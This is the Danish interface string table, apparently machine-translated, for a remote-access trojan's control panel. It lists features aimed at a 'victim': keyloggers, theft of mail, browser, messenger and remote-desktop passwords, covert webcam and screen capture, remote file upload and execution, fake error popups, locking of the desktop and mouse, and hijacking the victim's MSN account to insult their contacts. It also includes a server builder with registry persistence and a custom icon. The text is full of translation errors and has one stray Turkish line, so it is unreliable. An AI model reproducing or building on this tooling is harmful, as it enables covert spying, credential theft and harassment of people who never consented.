0 = kommunikation 
1 = passwords 
2 = administrere filer 
3 = tastatur 
4 = MSN indstillinger 
5 = Settings Manager 
6 = system oplysninger 
7 = sjov manager 
8 = capture 
9 = server ejendomme 
10 = kontakte os 
11 = chatte med ofret 
12 = send besked 
13 = server passwords 
14 = filhåndteringen 
15 = finde filer 
16 = virtuelle tastatur 
17 = online Keylogger 
18 = offline Keylogger 
19 = messenger optioner 
20 = MSN liste over kontaktpersoner 
21 = instant message 
22 = uendeligt sværger 
23 = mus indstillinger 
24 = ansøgninger 
25 = ansøgning indstillinger 
26 = Explorer Settings 
27 = resoulation indstillinger 
28 = få systemet info 
29 = installeret program 
30 = tjenester 
31 = sjov menuen 
32 = screen capture 
33 = webcam capture 
34 = server indstillinger 
35 = web site 
36 = ca 
37 = Coded af WHO! | Who@tikkysoft.com 
38 = Klar ... 
39 = Status: 
40 = Offline Keylogger 
41 = Running Applications 
42 = Send Fake Fejlmeddelelse 
43 = brug '|' karakter til at sende flersproget besked 
44 = Message Titel: 
45 = Message Icon: 
46 = Message: 
47 = Message Indstillinger 
48 = Message Knapper 
49 = System Information 
50 = Chat Med Victim 
51 = Fejlmeddelelser 
52 = Installeret Application List 
53 = Services 
54 = Online Keylogger 
55 = Web Cam Capture 
56 = Sjov Menu 
57 = Application Settings 
58 = Server Settings 
59 = Få Server Passwords 
60 = Internet Explorer Indstillinger 
61 = Adresse: 
62 = Navn: 
63 = straks: 
64 = sek. for tilslutning 
65 = Nøgle: 
66 = Værdi: 
66 = Msg Titel: 
67 = Message: 
68 = Message Icon: 
69 = Connection: 
70 = Server Editor 
71 = webcam Capture: 
72 = Transfer: 
73 = Screen Capture: 
74 = Send Instant Message 
75 = Messenger Adresse: 
76 = Instant Message: 
77 = Få Friendly Navn 
78 = Skift Friendly Navn 
79 = MSN Messenger Indstillinger 
80 = MSN Messenger Contact List 
81 = Change Status 
82 = Vælg den person, der vil blive misbrugt 
83 = Program Coded af WHO! 
84 = liste over dårlige ord vil blive brugt 
85 = MSN Messenger Indstillinger 
86 = www.tikkysoft.com 
87 = aktive / deaktivere status 
88 = få installeret ansøgninger liste 
89 = Gem liste 
90 = Slet liste 
91 = Server Editor 
92 = start chat med ofret 
93 = stop chatte med ofret 
94 = klar chat tekst 
95 = send besked 
96 = test besked 
97 = send besked 
98 = tydelig tekst område 
99 = Instant Messenger Passwords 
100 = Network Passwords 
101 = Protected Storage Passwords 
102 = Mail Passwords 
103 = Remote Desktop Passwords 
104 = Cd Keyler 
105 = Få System Information 
106 = Få System Information 
107 = Gem System Information 
108 = Ryd System Information 
109 = Automatisk 
110 = Manual 
111 = åbne online Keylogger 
112 = Luk online Keylogger 
113 = gemme logfiler 
114 = Slet logfiler 
115 = få offline Keylogger logfiler 
116 = gemme logfiler 
117 = Slet logfiler 
118 = Opdater liste 
119 = Ryd Application List 
120 = Start Service 
121 = Stop Service 
122 = Pause Service 
123 = Genoptag Service 
124 = deaktivere 
125 = Luk 
126 = Proces Modul 
127 = Indstil Prioritet Normal 
128 = Indstil Prioritet Ready 
129 = Indstil Prioritet High 
130 = Indstil Prioritet Real Time 
131 = Opdater liste 
132 = Vis alle ansøgninger 
133 = Maksimer Udvalgte Application 
134 = Minimer Udvalgte Application 
135 = Foretag Udvalgte Application Visible 
136 = Foretag Udvalgte Application Invisible 
137 = Luk valgte program 
138 = Skift Udvalgte Application Titel 
139 = Internet Explorer Passwords 
140 = Opkald Passwords 
141 = start fjernbetjening webcam capture 
142 = stop fjernbetjening webcam capture 
143 = skjul skrivebordet 
144 = Vis skrivebord 
145 = låse Desktop 
146 = Lås Desktop 
147 = skjul proceslinjen 
148 = Vis proceslinjen 
149 = låse proceslinjen 
150 = låse proceslinjen 
151 = skjul start-knappen 
152 = vise start-knappen 
153 = låse start-knappen 
154 = låse start-knappen 
155 = skjul mus 
156 = Vis mus 
157 = låse mus 
158 = låse mus 
159 = skjul opgave ikoner 
160 = Vis opgave ikoner 
161 = Skjul systemuret 
162 = Vis systemuret 
163 = Åbn cd-rom 
164 = Luk CD-Rom 
165 = Luk Monitor 
166 = Open Monitor 
167 = shutdown 
168 = genstart 
169 = logoff 
170 = overvintre 
171 = flip skærmen vandret 
172 = flip skærmen vertikalt 
173 = Skift Mouse Buttons 
174 = Indstil musens knapper til Default 
175 = Opem Num-Lock 
176 = Luk Num-Lock 
177 = Open Caps-Lock 
178 = Luk Caps-Lock 
179 = Åben Rul-Lock 
180 = Luk Scroll-lock 
181 = Start Infinity Beskeder Send 
182 = Stop Infinity Message 
183 = få serveren indstillinger 
184 = Gem server indstillinger 
185 = Luk server 
186 = Fjern server 
187 = Vælg ikon 
188 = ikonet jæger 
189 = test besked 
190 = skabe server 
191 = Open webside 
192 = Hent Internet Explorer Startsiden 
193 = Indstil Internet Explorer Startsiden 
194 = få MSN liste over kontaktpersoner 
195 = Gem MSN liste over kontaktpersoner 
196 = klar MSN liste over kontaktpersoner 
197 = get online kontakter 
198 = sende instant message 
199 = få venlige navn 
200 = sæt venlige navn 
201 = online 
202 = travlt 
203 = uden 
204 = taler i telefon 
205 = vil være tilbage snart 
206 = have frokost 
207 = Vis mig offline 
208 = closevictim session 
209 = Få dine online kontakter 
210 = sende dårlige ord 
211 = belastning sværger liste 
212 = kontrollere alle 
213 = Fjern alle markeringer 
214 = edsaflæggelse liste klar 
215 = Desktop 
216 = proceslinjen 
217 = Start-knappen 
218 = Mouse 
219 = Task Icons 
220 = Clock 
221 = CD-Rom 
222 = Monitor 
223 = Computer 
224 = Flip Screen 
225 = Mouse Buttons 
226 = Num 
227 = Caps 
228 = Rul 
229 = Send Infinity Message 
230 = Icon Indstillinger 
231 = Fake Fejlmeddelelse 
232 = IP / DNS 
233 = Port Settings 
234 = Connection Delay 
235 = Victim Navn 
236 = Installer Sti 
237 = Indstillinger i registreringsdatabasen 
238 = Server Mode 
239 = Open webside Remotelly 
240 = Få Internet Explorer Start Page 
241 = Skift Internet Explorer Start Page 
242 = Victim Navn 
243 = IP-adresse 
244 = User Name 
245 = Computer Name 
246 = Admin 
247 = Operating System 
248 = CPU 
249 = Ram 
250 = Land 
251 = Egenskaber 
252 = værdi 
253 = Beskrivelse 
254 = oplysninger 
255 = Navn 
256 = Version 
257 = Publisher 
258 = Sti 
259 = Navn 
260 = Visningsnavn 
261 = Status 
262 = Start 
263 = Modul 
264 = Navn 
265 = PID 
266 = Sti 
267 = hukommelsesanvendelse 
268 = Prioritet 
269 = Navn 
270 = Handle 
271 = Placement 
272 = PID 
273 = Klasse 
274 = Connection 
275 = Havn 
276 = MSN Adresse 
277 = Friendly Navn 
278 = Online kontaktpersoner 
279 = Connection 
280 = Overførsel 
281 = Screen 
282 = WebCam 
283 = Hvor 
284 = Fra 
285 = Størrelse 
286 = Status 
287 = U / D 
288 = op 
289 = Vis skrivebord 
290 = viser dokumenter 
291 = Vis vinduer 
292 = Vis system 
293 = Vis program files 
294 = Vis start 
295 = læse tekstfil 
296 = lære bilister 
297 = sæt walpaper 
298 = Vis tekst område 
299 = Opret en ny mappe 
300 = slette filen 
301 = slette mappe 
302 = download 
303 = upload 
304 = omdøbe 
305 = køre 
306 = skjul tekst område 
307 = refresg 
308 = Gem tekst 
309 = tydelig tekst 
310 = chauffører 
311 = fil 
312 = Type 
313 = størrelse 
314 = attributter 
315 = File Manager 
316 = Afslut 
317 = Vis 
318 = Screen Capture 
319 = Start Capture 
320 = Stop Capture 
321 = Start Mouse Control 
322 = Stop Mouse Control 
323 = Fuld skærm 
324 = Minimer 
326 = klient Aktiv 
327 = klient deaktivere 
328 = installeret program listen modtager ... 
329 = installeret program liste Gemmer ... 
330 = installeret program liste gemt. 
331 = installeret program liste er ikke blevet gemt. 
332 = installeret program liste rengøring ... 
333 = installeret program liste renses. 
334 = åbning chat ... 
335 = lukke chat ... 
336 = rengøring chat-skærmen. 
337 = chat skærmen er rengjort. 
338 = sende instant message .... 
339 = falsk fejlmeddelelse afprøvning ... 
340 = falsk fejlmeddelelse er blevet testet. 
341 = sende falske fejlmeddelelse ... 
342 = rengøring tekst område ... 
343 = text-området rengjort. 
344 = Modtage Instant Messenger Passwords .. 
345 = modtagende netværk passwords .. 
346 = modtagende beskyttet staroage passwords ... 
347 = modtager mail passwords ... 
348 = modtagende remote desktop passwords .. 
349 = modtagende cd keys ... 
350 = modtagende browser passwords ... 
351 = modtagende dial-up passwords ... 
352 = modtage tjenester liste ... 
353 = modtagende system information ... 
354 = besparelse system oplysninger ... 
355 = system oplysninger er blevet gemt. 
356 = system oplysninger er ikke blevet gemt. 
357 = rengøring system oplysninger ... 
358 = system oplysninger er blevet rengjort. 
359 = indstilling tjenester maskinskrevet 
360 = indstilling tjenester manuelt 
361 = oppenig online Keylogger ... 
362 = lukke online Keylogger ... 
363 = besparelse online Keylogger logfiler ... 
364 = online Keylogger logfiler er blevet gemt. 
365 = online Keylogger logfiler er ikke blevet gemt. 
366 = rengøring online Keylogger logfiler ... 
367 = online Keylogger logfiler er rengjort. 
368 = receivng offline Keylogger logfiler ... 
369 = besparelse offline Keylogger logfiler 
370 = offline Keylogger logfiler er blevet gemt 
371 = offline Keylogger logfiler er ikke blevet gemt. 
372 = rengøring offline Keylogger logfiler ... 
373 = offline Keylogger logfiler er rengjort. 
374 = modtager ansøgningen listen. 
375 = rengøring ansøgning liste ... 
376 = anvendelse listen renses. 
377 = bedes du vælge et punkt på dagsordenen! 
378 = Starting service ... 
379 = Stop tjeneste ... 
380 = Midlertidig standsning tjeneste ... 
381 = Genoptagelse tjeneste ... 
382 = lukke ansøgning ... 
383 = viser modul ... 
384 = modul sti 
385 = størrelse 
386 = image base 
387 = Etablering webcam forbindelse ... 
388 = stoppesteder WebCam Capture ... 
389 = Skjule Desktop ... 
390 = Viser Desktop ... 
391 = Låse Desktop ... 
392 = Frigørelse skrivebord .... 
393 = Skjule proceslinjen ... 
394 = Viser proceslinjen ... 
395 = Låse proceslinjen ... 
396 = Frigørelse proceslinjen ... 
397 = Skjule start-knappen ... 
398 = Viser start-knappen ... 
399 = Låse start-knappen ... 
400 = Frigørelse start-knappen ... 
401 = dækkeevne musemarkøren ... 
402 = viser musemarkøren ... 
403 = låsning musemarkøren ... 
404 = låse musemarkøren ... 
405 = Skjule opgave ikoner ... 
406 = Viser opgave ikoner ... 
407 = Skjule systemuret ... 
408 = Viser systemuret ... 
409 = Oppenning CD-Rom ... 
410 = Closing CD-Rom ... 
411 = Closing overvåge ... 
412 = Oppenning overvåge ... 
413 = lukke computeren ned .. 
414 = Genstart ... 
415 = Logging Windows off ... 
416 = hibernating vinduer off ... 
417 = spejlvende skærmen vertikalt ... 
418 = spejlvende skærmen vandret ... 
419 = Ændre musens knapper ... 
420 = Setting musens knapper til standard ... 
421 = Låse Num-Lock .. 
422 = Frigørelse Num-Lock .. 
423 = Låse capslock ... 
424 = Frigørelse capslock ... 
425 = Låse scrolllock ... 
426 = Frigørelse scrolllock ... 
427 = Afsendelse uendelig beskeder ... 
428 = stoppesteder uendelig beskeder ... 
429 = modtagende server informations ... 
430 = besparelse en ny indstillinger ... 
431 = server lukning ... 
432 = afinstallere server ... 
433 = tilføje ikonet ... 
434 = ikonet er blevet tilføjet. 
435 = ikon er ikke blevet tilføjet. 
436 = Indstillinger gemt og server oprettet! 
437 = besparelse server indstillinger og skabe server ... 
438 = dette ikon ikke gyldig. 
439 = ikonet er blevet udvalgt. 
440 = modtager MSN kontakt liste ... 
441 = MSN liste over kontaktpersoner er blevet gemt. 
442 = MSN liste over kontaktpersoner er ikke blevet gemt. 
443 = hentning online kontakter fra ofrene kontakt liste 
444 = sende instant message til person, du har valgt 
445 = få ofrets venlige navn 
446 = skiftende ofrets venlige navn 
447 = ændre offerets status til 'online' 
448 = ændre offerets status til 'travlt' 
449 = ændre offerets status til 'udenfor' 
450 = ændre offerets status til 'at tale i telefon' 
451 = ændre offerets status til 'vil være tilbage snart « 
452 = ændre offerets status til 'at have frokost « 
453 = ændre offerets status til 'Vis mig offline' 
454 = lukke offer MSN logon ... 
455 = misbruger den person, du har udvalgt fra ofrets liste 
456 = installerer sværger liste ... 
457 = sværger liste installeret 
458 = sværger listen ikke er installeret 
459 = alle liste poster er blevet kontrolleret. 
460 = alle listeobjekter er blevet markeret. 
461 = sværger listen renses. 
462 = chat skærmen oppened. 
463 = chat skærmen lukket. 
464 = system modtagne oplysninger. 
465 = anvendelse liste reveiced 
466 = installeret program liste modtaget. 
467 = chauffører modtaget. 
468 = mappen er blevet slettet. 
469 = mappen er ikke blevet slettet. 
470 = en fejl accoured. 
471 = system modtagne oplysninger. 
472 = ofline Keylogger logfiler modtaget. 
473 = offer er online. 
474 = genveje modtaget. 
475 = server passwords modtaget. 
476 = web cam blev ikke fundet. 
477 = web cam drivere modtaget. 
478 = web site tilsluttet. 
479 = internet explorer startside modtaget. 
480 = internet explorer startside er blevet ændret. 
481 = modtager online Keylogger logfiler ... 
482 = text fil er blevet readed. 
483 = MSN liste over kontaktpersoner modtaget. 
484 = MSN online kontakt liste modtaget. 
485 = MSN venlige navn modtaget. 
486 = Filstørrelsen modtaget. 
487 = online Keylogger lukket 
488 = online Keylogger begyndt 
489 = slettet. 
490 = fil er blevet kørt. 
491 = fil er blevet renemaed. 
492 = fil has't været renemaed. 
493 = uygulama calistirilamadi 
494 = filen ikke slettet. 
495 = tapet ændret. 
496 = wallpaper ikke ændres. 
497 = offer ændret sin status til 'online' 
498 = offer ændret sin status til 'travlt' 
499 = offer ændret sin status til 'udenfor' 
500 = offer ændret sin status til 'at tale i telefon' 
501 = offer ændret sin status til 'vil være tilbage snart « 
502 = offer ændret sin status til 'at have frokost « 
503 = offer ændret sin status til 'Vis mig offline' 
504 = ofrets session held lukket 
505 = 505 = ofrets fulde navn er blevet ændret 
506 = held misbrugt den person, du har udvalgt fra ofrets liste 
507 = instant beskeden er sendt. 
508 = Desktop er skjulte 
509 = Desktop er synlig 
510 = Desktop låst 
511 = Desktop ulåst 
512 = proceslinjen er skjult 
513 = proceslinjen er synlig 
514 = proceslinjen er låst 
515 = proceslinjen er låst op 
516 = Start-knappen er skjult 
517 = Start-knappen er synlig 
518 = Start-knappen er låst 
519 = Start-knappen er låst op 
520 = musemarkøren skjulte 
521 = musemarkøren synlige 
522 = musemarkøren låst 
523 = musemarkøren ulåst 
524 = opgave ikoner er skjulte 
525 = opgave ikoner er synlige 
526 = ur skjulte 
527 = ur synlige 
528 = cd-rom åbnet 
529 = cd-rom lukket 
530 = overvåge lukket 
531 = overvåge åbnet 
532 = Computer shutdowned. 
533 = Computer genstartet. 
534 = Windows logget ud 
535 = windows hibernating. 
536 = Screen vendt vertikalt 
537 = Screen vendt vandret 
538 = museknapper ændret 
539 = museknapper sæt standard 
540 = numlock åbnet 
541 = numlock lukket 
542 = capslock åbnet 
543 = capslock lukket 
544 = scrolllock åbnet 
545 = scrolllock lukket 
546 = uendelig besked send er blevet indledt. 
547 = uendelig besked send er blevet stoppet. 
548 = falsk fejlmeddelelse har været sende. 
549 = mappen er blevet oprettet. 
550 = Remote screen capture oprettelse ... 
551 = Remote Desktop Connection stoppet 
552 = Indtast mappenavn: 
553 = Ny mappe 
554 = Ny mappe 
555 = Icon er blevet gemt. 
556 = Ikon ikke gemt. 
557 = Indtast et nyt navn: 
558 = Ny Navn 
559 = ingen conenction! 
560 = venter ... 
561 = downloading ... 
562 = fil er blevet downloadet. 
563 = uploade ... 
564 = fil er blevet uploadet. 
565 = tilsluttet. 
566 = filer modtaget. 
567 = Genopfrisk ansøgning liste ... 
568 = Application maksimeret 
569 = Application minimere 
570 = Application viste 
571 = Application er skjult 
572 = Application vinduet lukket 
573 = Application Billedtekst ændret. 
574 = alle modtagne ansøgninger. 
575 = tjenesteydelser listen modtaget. 
576 = proces modul modtaget. 
577 = anvendelse listen modtaget. 
578 = MSN Messenger-login lukket. 
579 = du vælge en kammerat 
580 = filer modtaget. 
581 = Webcam streaming stoppet 
582 = webcam ikke fundet. 
583 = du vælge en ansøgning 
584 = Filstørrelse 0 KB. 
585 = læse Word-fil 
586 = Start overførsel 
587 = stoppe overførslen 
588 = fjerne liste 
589 = Slet liste 
590 = server lukket 
591 = Server indstillinger gemt 
592 = stik henrettet. 
593 = Stik fil er blevet tilføjet til upload liste 
594 = du vælge en kontaktperson 
595 = lokale værktøjer 
596 = succes 
597 = succes 
598 = Udskriv 
599 = Udskriv en tekst 
600 = Tekst indstillinger 
601 = trykt tekst 
602 = Størrelse 
603 = Fed 
604 = Understreget 
605 = Italic 
606 = Strikethru 

607 = Ryd tekst 
608 = Udskriv tekst 
609 = Printing tekst ... 
610 = tekst er printet. 
611 = tekst ikke er blevet udskrevet. 
612 = Ryd tekst